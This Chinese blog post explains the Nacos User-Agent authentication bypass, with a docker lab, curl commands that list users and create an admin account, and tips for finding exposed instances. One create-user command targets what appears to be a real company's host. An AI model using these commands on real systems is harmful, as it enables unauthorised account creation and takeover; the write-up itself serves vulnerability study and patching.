NACOS身份认证绕过漏洞

本文详细介绍了Nacos存在的一个身份认证绕过漏洞,该漏洞允许攻击者未经授权访问和操作。受影响的版本包括<=Nacos2.0.0-ALPHA.1和<Nacos1.4.1。通过篡改User-Agent字段,攻击者可以创建新用户并进行登录操作。修复建议是升级到最新版本。此外,提供了漏洞复现步骤和批量检测POC,以及在渗透测试中发现此漏洞的方法。
摘要由CSDN通过智能技术生成

目录

漏洞描述

影响版本

docker-compose文件一键搭建漏洞环境

漏洞复现

修复建议

漏洞挖掘

NACOS身份认证绕过漏洞批量检测POC


nacos:Nacos 致力于帮助您发现、配置和管理微服务。Nacos 提供了一组简单易用的特性集,帮助您快速实现动态服务发现、服务配置、服务元数据及流量管理。

漏洞描述

2020年12月29日,Nacos官方在github发布的issue中披露Alibaba Nacos 存在一个由于不当处理User-Agent导致的未授权访问漏洞 。通过该漏洞,攻击者可以进行任意操作,包括创建新用户并进行登录后操作

影响版本

  • <= Nacos 2.0.0-ALPHA.1
  • < Nacos 1.4.1

docker-compose文件一键搭建漏洞环境

使用nacos1.4.0版本(1.4.1不存在漏洞)的环境

下载并安装docker

docker-compose.yml文件内容如下

version: '3'
services:
  nacos:
    restart: always
    image: nacos/nacos-server:1.4.0
    container_name: nacos
    ports:
      - 8848:8848
    environment:
      MODE: standalone

执行docker-compose up -d启动漏洞环境

访问 http://192.168.xx.xx:8848/nacos/#/login

默认用户名密码 nacos,nacos

漏洞复现

1. 访问用户列表接口

http://192.168.1.5:8848/nacos/v1/auth/users/?pageNo=1&pageSize=9

或者使用curl工具

curl -XGET 'http://192.168.1.5:8848/nacos/v1/auth/users/?pageNo=1&pageSize=9'

如出现下面的所示的页面,列出了所有登录的账号和密码说明存在漏洞

2. 向服务器添加一个新的账号和密码

访问nacos/v1,截取请求包,将GET请求换为POST,User-Agent值修改为:Nacos-Server

服务器返回创建用户成功

或者使用curl工具

curl -XPOST 'https://lingting.mininglamp.com/nacos/v1/auth/users?username=test&password=test'

3. 再次查看用户列表,发现多了一个我们添加的账户

4. 用创建的账号进行登录

修复建议

升级至最新版

漏洞挖掘

在最近的一次真实的渗透测试中发现了这个漏洞,其部署在阿里云系统上,那如何来发现这个漏洞了

1. 可以在网站域名如.com后面拼接nacos,查看有没有nacos这个服务

2. 再访问用户接口列表查看,若没有漏洞则为这样,状态码为401

NACOS身份认证绕过漏洞批量检测POC

NACOS身份认证绕过漏洞批量检测poc.7z_nacos漏洞-网络安全文档类资源-CSDN下载

评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Ly4j

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值